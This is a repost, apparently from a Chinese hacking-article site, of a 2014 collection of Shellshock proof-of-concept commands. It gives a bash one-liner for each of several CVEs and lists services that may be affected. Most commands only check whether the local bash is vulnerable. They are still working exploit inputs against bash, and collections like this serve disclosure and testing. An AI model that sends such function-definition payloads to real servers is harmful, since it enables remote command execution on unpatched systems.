记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

bash漏洞利用代码集锦

2014-10-09 18:48

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Please submit a pull request if you have more links or other resources

Speculation:(Non-confirmed possibly vulnerable)

If you know of PoCs for any of these, please submit an issue or pull request with a link.

Command Line (Linux, OSX, and Windows via Cygwin)

  • bashcheck - script to test for the latest vulns

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • () { _; } >_[$($())] { echo hi mom; id; }

CVE-2014-6277

will segfault if vulnerable

IBM z/OS -

HTTP

Phusion Passenger

DHCP

SSH

OSX

SIP

Qmail

Postfix

FTP

OpenVPN

Oracle

TMNT

Hand

user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |


知识来源: https://github.com/mubix/shellshocker-pocs

阅读:333213 | 评论:0 | 标签:bash漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“bash漏洞利用代码集锦”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁